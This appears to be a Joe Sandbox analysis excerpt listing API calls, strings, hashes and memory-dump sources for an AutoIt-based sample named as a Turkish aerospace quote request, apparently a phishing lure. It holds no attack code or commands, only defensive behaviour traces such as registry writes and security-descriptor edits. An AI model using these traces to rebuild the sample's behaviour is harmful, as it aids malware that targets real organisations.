                                                                                                                                    • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0021752A
                                                                                                                                    • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00217554
                                                                                                                                    • InflateRect.USER32(?,000000FD,000000FD), ref: 00217572
                                                                                                                                    • DrawFocusRect.USER32(?,?), ref: 0021757D
                                                                                                                                    • GetSysColor.USER32(00000011), ref: 0021758E
                                                                                                                                    • SetTextColor.GDI32(?,00000000), ref: 00217596
                                                                                                                                    • DrawTextW.USER32(?,002170F5,000000FF,?,00000000), ref: 002175A8
                                                                                                                                    • SelectObject.GDI32(?,?), ref: 002175BF
                                                                                                                                    • DeleteObject.GDI32(?), ref: 002175CA
                                                                                                                                    • SelectObject.GDI32(?,?), ref: 002175D0
                                                                                                                                    • DeleteObject.GDI32(?), ref: 002175D5
                                                                                                                                    • SetTextColor.GDI32(?,?), ref: 002175DB
                                                                                                                                    • SetBkColor.GDI32(?,?), ref: 002175E5
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1996641542-0
                                                                                                                                    • Opcode ID: e87d67e444982466d4555559d8393df044101eca049e01b2d35e536ad2fc0931
                                                                                                                                    • Instruction ID: d98e48c9a7bebf427d172edd166da1b1fc3fe17b45b7a41e1ccbbcef91c6cfe6
                                                                                                                                    • Opcode Fuzzy Hash: e87d67e444982466d4555559d8393df044101eca049e01b2d35e536ad2fc0931
                                                                                                                                    • Instruction Fuzzy Hash: CC616E76940219BFDF019FA4EC49AEE7FB9EB58320F218115F915BB2A1DB709940CF90
                                                                                                                                    APIs
                                                                                                                                    • GetCursorPos.USER32(?), ref: 00211128
                                                                                                                                    • GetDesktopWindow.USER32 ref: 0021113D
                                                                                                                                    • GetWindowRect.USER32(00000000), ref: 00211144
                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00211199
                                                                                                                                    • DestroyWindow.USER32(?), ref: 002111B9
                                                                                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 002111ED
                                                                                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0021120B
                                                                                                                                    • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0021121D
                                                                                                                                    • SendMessageW.USER32(00000000,00000421,?,?), ref: 00211232
                                                                                                                                    • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00211245
                                                                                                                                    • IsWindowVisible.USER32(00000000), ref: 002112A1
                                                                                                                                    • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 002112BC
                                                                                                                                    • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 002112D0
                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 002112E8
                                                                                                                                    • MonitorFromPoint.USER32(?,?,00000002), ref: 0021130E
                                                                                                                                    • GetMonitorInfoW.USER32(00000000,?), ref: 00211328
                                                                                                                                    • CopyRect.USER32(?,?), ref: 0021133F
                                                                                                                                    • SendMessageW.USER32(00000000,00000412,00000000), ref: 002113AA
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                                                    • String ID: ($0$tooltips_class32
                                                                                                                                    • API String ID: 698492251-4156429822
                                                                                                                                    • Opcode ID: f87806654e842c7be96eca0c5037e1baa6e1cbf3524ab83ae091b36130297118
                                                                                                                                    • Instruction ID: 775aeadc9af1374bc2ae7c34e4d55ae1874316f7dfdf48825324053495c2e292
                                                                                                                                    • Opcode Fuzzy Hash: f87806654e842c7be96eca0c5037e1baa6e1cbf3524ab83ae091b36130297118
                                                                                                                                    • Instruction Fuzzy Hash: 0CB19F71618341AFD704DF64D884BAABBE4FF94350F00891CFA999B2A1CB71D8A4CF91
                                                                                                                                    APIs
                                                                                                                                    • CharUpperBuffW.USER32(?,?), ref: 002102E5
                                                                                                                                    • _wcslen.LIBCMT ref: 0021031F
                                                                                                                                    • _wcslen.LIBCMT ref: 00210389
                                                                                                                                    • _wcslen.LIBCMT ref: 002103F1
                                                                                                                                    • _wcslen.LIBCMT ref: 00210475
                                                                                                                                    • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 002104C5
                                                                                                                                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00210504
                                                                                                                                      • Part of subcall function 0019F9F2: _wcslen.LIBCMT ref: 0019F9FD
                                                                                                                                      • Part of subcall function 001E223F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 001E2258
                                                                                                                                      • Part of subcall function 001E223F: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 001E228A
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                                                                    • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                                                                    • API String ID: 1103490817-719923060
                                                                                                                                    • Opcode ID: 43691cccc738936aca1009e6cf2f10ddb0b0bd806763a13d5f661a0bdd71ef54
                                                                                                                                    • Instruction ID: 27e9d41f0a75349f187029e4d06be240bd2900d955b39b4adb7374a89194e22d
                                                                                                                                    • Opcode Fuzzy Hash: 43691cccc738936aca1009e6cf2f10ddb0b0bd806763a13d5f661a0bdd71ef54
                                                                                                                                    • Instruction Fuzzy Hash: 54E1D1312282419FC714EF24C4D08AEB3E6BFE8718B54496DF8969B2A1DB70EDD5CB41
                                                                                                                                    APIs
                                                                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00198968
                                                                                                                                    • GetSystemMetrics.USER32(00000007), ref: 00198970
                                                                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0019899B
                                                                                                                                    • GetSystemMetrics.USER32(00000008), ref: 001989A3
                                                                                                                                    • GetSystemMetrics.USER32(00000004), ref: 001989C8
                                                                                                                                    • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 001989E5
                                                                                                                                    • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 001989F5
                                                                                                                                    • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00198A28
                                                                                                                                    • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00198A3C
                                                                                                                                    • GetClientRect.USER32(00000000,000000FF), ref: 00198A5A
                                                                                                                                    • GetStockObject.GDI32(00000011), ref: 00198A76
                                                                                                                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 00198A81
                                                                                                                                      • Part of subcall function 0019912D: GetCursorPos.USER32(?), ref: 00199141
                                                                                                                                      • Part of subcall function 0019912D: ScreenToClient.USER32(00000000,?), ref: 0019915E
                                                                                                                                      • Part of subcall function 0019912D: GetAsyncKeyState.USER32(00000001), ref: 00199183
                                                                                                                                      • Part of subcall function 0019912D: GetAsyncKeyState.USER32(00000002), ref: 0019919D
                                                                                                                                    • SetTimer.USER32(00000000,00000000,00000028,001990FC), ref: 00198AA8
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                                                    • String ID: AutoIt v3 GUI
                                                                                                                                    • API String ID: 1458621304-248962490
                                                                                                                                    • Opcode ID: a32c44dca3ed8b5396be468f46d13ce8c866f196dd9998a2131ac1db65fabc13
                                                                                                                                    • Instruction ID: 015f677011aa8c38bfe3c1e5d91f688adea613c4cac1438333b49cd76d365f37
                                                                                                                                    • Opcode Fuzzy Hash: a32c44dca3ed8b5396be468f46d13ce8c866f196dd9998a2131ac1db65fabc13
                                                                                                                                    • Instruction Fuzzy Hash: 0BB18B75A40209AFDF14DFA8DC49BEE3BB5FB58315F10422AFA15AB290DB34E850CB54
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 001E10F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 001E1114
                                                                                                                                      • Part of subcall function 001E10F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,001E0B9B,?,?,?), ref: 001E1120
                                                                                                                                      • Part of subcall function 001E10F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,001E0B9B,?,?,?), ref: 001E112F
                                                                                                                                      • Part of subcall function 001E10F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,001E0B9B,?,?,?), ref: 001E1136
                                                                                                                                      • Part of subcall function 001E10F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 001E114D
                                                                                                                                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 001E0DF5
                                                                                                                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 001E0E29
                                                                                                                                    • GetLengthSid.ADVAPI32(?), ref: 001E0E40
                                                                                                                                    • GetAce.ADVAPI32(?,00000000,?), ref: 001E0E7A
                                                                                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 001E0E96
                                                                                                                                    • GetLengthSid.ADVAPI32(?), ref: 001E0EAD
                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00000008), ref: 001E0EB5
                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 001E0EBC
                                                                                                                                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 001E0EDD
                                                                                                                                    • CopySid.ADVAPI32(00000000), ref: 001E0EE4
                                                                                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 001E0F13
                                                                                                                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 001E0F35
                                                                                                                                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 001E0F47
                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 001E0F6E
                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 001E0F75
                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 001E0F7E
                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 001E0F85
                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 001E0F8E
                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 001E0F95
                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 001E0FA1
                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 001E0FA8
                                                                                                                                      • Part of subcall function 001E1193: GetProcessHeap.KERNEL32(00000008,001E0BB1,?,00000000,?,001E0BB1,?), ref: 001E11A1
                                                                                                                                      • Part of subcall function 001E1193: HeapAlloc.KERNEL32(00000000,?,00000000,?,001E0BB1,?), ref: 001E11A8
                                                                                                                                      • Part of subcall function 001E1193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,001E0BB1,?), ref: 001E11B7
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 4175595110-0
                                                                                                                                    • Opcode ID: b60bc3ab26acbc892dc0e562d331a3f1af28eb1c173059682fe3dbf17bf793b4
                                                                                                                                    • Instruction ID: c3d00cb842b1ee2bea78e3114a18580e01f4be7793d3428b742683c064a64b20
                                                                                                                                    • Opcode Fuzzy Hash: b60bc3ab26acbc892dc0e562d331a3f1af28eb1c173059682fe3dbf17bf793b4
                                                                                                                                    • Instruction Fuzzy Hash: 5471AE7590024AABDF21DFA5EC48FEEBBB8BF18300F148125F918E6191DB719D55CB60
                                                                                                                                    APIs
                                                                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0020C4BD
                                                                                                                                    • RegCreateKeyExW.ADVAPI32(?,?,00000000,0021CC08,00000000,?,00000000,?,?), ref: 0020C544
                                                                                                                                    • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 0020C5A4
                                                                                                                                    • _wcslen.LIBCMT ref: 0020C5F4
                                                                                                                                    • _wcslen.LIBCMT ref: 0020C66F
                                                                                                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 0020C6B2
                                                                                                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 0020C7C1
                                                                                                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 0020C84D
                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 0020C881
                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 0020C88E
                                                                                                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 0020C960
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                                                                                                                    • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                                    • API String ID: 9721498-966354055
                                                                                                                                    • Opcode ID: 6f828dc2911b4d0eaf6ceef2995ece752d89193f643f4c82ea837d86892e1319
                                                                                                                                    • Instruction ID: 4f54fb26427e32e769c7ef52fd44467ea5c701911368fe4f5e76f96044fe99b1
                                                                                                                                    • Opcode Fuzzy Hash: 6f828dc2911b4d0eaf6ceef2995ece752d89193f643f4c82ea837d86892e1319
                                                                                                                                    • Instruction Fuzzy Hash: B81266752142019FDB14EF14D881A2ABBE5FF88714F24895CF89A9B3A2DB31ED41CB91
                                                                                                                                    APIs
                                                                                                                                    • CharUpperBuffW.USER32(?,?), ref: 002109C6
                                                                                                                                    • _wcslen.LIBCMT ref: 00210A01
                                                                                                                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00210A54
                                                                                                                                    • _wcslen.LIBCMT ref: 00210A8A
                                                                                                                                    • _wcslen.LIBCMT ref: 00210B06
                                                                                                                                    • _wcslen.LIBCMT ref: 00210B81
                                                                                                                                      • Part of subcall function 0019F9F2: _wcslen.LIBCMT ref: 0019F9FD
                                                                                                                                      • Part of subcall function 001E2BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 001E2BFA
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                                                                    • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                                                    • API String ID: 1103490817-4258414348
                                                                                                                                    • Opcode ID: 3f42dd62258f29d4111f5a695ab2855799d83108a7ebba6e06ad4868daa6df63
                                                                                                                                    • Instruction ID: 5f1a811b01bd97558bf81a92654316c5c5b34885632836367b2b583bce62218f
                                                                                                                                    • Opcode Fuzzy Hash: 3f42dd62258f29d4111f5a695ab2855799d83108a7ebba6e06ad4868daa6df63
                                                                                                                                    • Instruction Fuzzy Hash: A7E1C2352287028FC714EF24C49096EB7E1FFA8318B14495DF8959B3A2D770EE95CB91
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _wcslen$BuffCharUpper
                                                                                                                                    • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                                                    • API String ID: 1256254125-909552448
                                                                                                                                    • Opcode ID: f5d595a2d6b6835bc6871577f78794ddfead7dc59b4c3e89df4ecc5603ced536
                                                                                                                                    • Instruction ID: 2cb29674b33ff7df71b6977a7cbcb16e3e95c187472c5639d938f3f6372aace5
                                                                                                                                    • Opcode Fuzzy Hash: f5d595a2d6b6835bc6871577f78794ddfead7dc59b4c3e89df4ecc5603ced536
                                                                                                                                    • Instruction Fuzzy Hash: F871F5B263026B8BCB10DF68C8415BB3395AB71758B750729FC66972C6E770CD65C3A0
                                                                                                                                    APIs
                                                                                                                                    • _wcslen.LIBCMT ref: 0021835A
                                                                                                                                    • _wcslen.LIBCMT ref: 0021836E
                                                                                                                                    • _wcslen.LIBCMT ref: 00218391
                                                                                                                                    • _wcslen.LIBCMT ref: 002183B4
                                                                                                                                    • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 002183F2
                                                                                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00215BF2), ref: 0021844E
                                                                                                                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00218487
                                                                                                                                    • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 002184CA
                                                                                                                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00218501
                                                                                                                                    • FreeLibrary.KERNEL32(?), ref: 0021850D
                                                                                                                                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0021851D
                                                                                                                                    • DestroyIcon.USER32(?,?,?,?,?,00215BF2), ref: 0021852C
                                                                                                                                    • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00218549
                                                                                                                                    • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00218555
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                                                                                                    • String ID: .dll$.exe$.icl
                                                                                                                                    • API String ID: 799131459-1154884017
                                                                                                                                    • Opcode ID: a12915a7dab418be1113de151883e9b1afd18638a29345306d418d5a67f927f8
                                                                                                                                    • Instruction ID: 173934c67da0499232269defff9aa4e769352abf3518e7daee83a548a46d22c3
                                                                                                                                    • Opcode Fuzzy Hash: a12915a7dab418be1113de151883e9b1afd18638a29345306d418d5a67f927f8
                                                                                                                                    • Instruction Fuzzy Hash: 0661C171550216BBEB14DF64DC85BFE77A8FB28711F104609F815D60D1DFB4AAA0CBA0
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                                                                    • API String ID: 0-1645009161
                                                                                                                                    • Opcode ID: 32c7ca0d4d559454ab7d232753c2017aea258b76b10b9fd1cf6bdc5d652e5104
                                                                                                                                    • Instruction ID: d8e42c05ff09e03f5db34a81237c34a68d09b723cacda57ef3f1b1222e7d8562
                                                                                                                                    • Opcode Fuzzy Hash: 32c7ca0d4d559454ab7d232753c2017aea258b76b10b9fd1cf6bdc5d652e5104
                                                                                                                                    • Instruction Fuzzy Hash: DF81E571644605BBDB24BF60DC46FAE77B9AF36300F144029F805AA1D6EB70DB91CBA1
                                                                                                                                    APIs
                                                                                                                                    • LoadIconW.USER32(00000063), ref: 001E5A2E
                                                                                                                                    • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 001E5A40
                                                                                                                                    • SetWindowTextW.USER32(?,?), ref: 001E5A57
                                                                                                                                    • GetDlgItem.USER32(?,000003EA), ref: 001E5A6C
                                                                                                                                    • SetWindowTextW.USER32(00000000,?), ref: 001E5A72
                                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 001E5A82
                                                                                                                                    • SetWindowTextW.USER32(00000000,?), ref: 001E5A88
